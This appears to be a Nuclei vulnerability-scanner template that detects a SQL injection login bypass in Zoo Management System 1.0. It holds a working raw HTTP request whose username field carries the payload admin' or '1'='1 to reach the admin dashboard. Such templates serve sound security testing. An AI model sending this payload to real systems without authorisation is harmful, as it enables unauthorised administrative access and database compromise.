nuclei-templates/http/vulnerabilities/other/zms-sqli.yaml

48 lines
1.5 KiB
YAML

id: zms-sqli
info:
name: Zoo Management System 1.0 - SQL Injection
author: arafatansari
severity: critical
description: |
Zoo Management System 1.0 contains a SQL injection vulnerability via the username parameter on the login page. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
reference:
- https://www.exploit-db.com/exploits/48880
- https://packetstormsecurity.com/files/167572/Zoo-Management-System-1.0-Cross-Site-Scripting.html
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10
cwe-id: CWE-89
metadata:
verified: true
max-request: 1
tags: edb,packetstorm,zms,sqli,auth-bypass,cms
http:
- raw:
- |
POST /admin/index.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
username=admin%27+or+%271%27%3D%271&password=any&login=
host-redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'ZMS ADMIN'
- 'Dashboard'
- 'Zoo Management System'
condition: and
- type: status
status:
- 200
# digest: 4a0a0047304502210092c7c0fad3b15138239ae9b01ddf842b9362e14a53f3c4ba74a33d3a7a17cb37022055abd4ae81c20368be6e28d60dcb8c11539b94c199e021133662e4dce51c8b19:922c64590222798bb761d5b6d8e72950